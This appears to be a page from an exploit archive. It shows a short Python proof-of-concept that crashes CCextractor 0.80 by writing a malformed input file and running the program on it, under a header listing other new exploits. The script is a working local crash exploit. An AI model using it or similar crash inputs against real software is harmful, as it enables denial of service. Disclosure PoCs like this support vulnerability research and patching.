8164665ff7
6 new exploits FlatPress 1.0.3 - CSRF Arbitrary File Upload AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities ProcessMaker 3.0.1.7 - Multiple vulnerabilities CCextractor 0.80 - Crash PoC Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf) TCPDump 4.5.1 - Crash PoC
43 lines
941 B
Python
Executable file
43 lines
941 B
Python
Executable file
# Exploit Title: CCextractor 0.80 Access Violation Crash
|
|
# Date: 31st May 2016
|
|
# Exploit Author: David Silveiro (Xino.co.uk)
|
|
# Vendor Homepage: http://www.ccextractor.org/
|
|
# Software Link: http://www.ccextractor.org/download-ccextractor.html
|
|
# Version: 0.80
|
|
# Tested on: Ubuntu 14 LTS
|
|
# CVE : 0 day
|
|
|
|
from subprocess import call
|
|
from shlex import split
|
|
from time import sleep
|
|
|
|
|
|
def crash():
|
|
|
|
command = './ccextractor crash'
|
|
|
|
buffer = '\x00\x00\x00\x04ssixssixs'
|
|
|
|
with open('crash', 'w+b') as file:
|
|
file.write(buffer)
|
|
|
|
try:
|
|
call(split(command))
|
|
print("Exploit successful! ")
|
|
|
|
except:
|
|
print("Error: Something has gone wrong!")
|
|
|
|
|
|
def main():
|
|
|
|
print("Author: David Silveiro ")
|
|
print(" CCextractor 0.80 Access Violation Crash ")
|
|
|
|
sleep(2)
|
|
|
|
crash()
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main()
|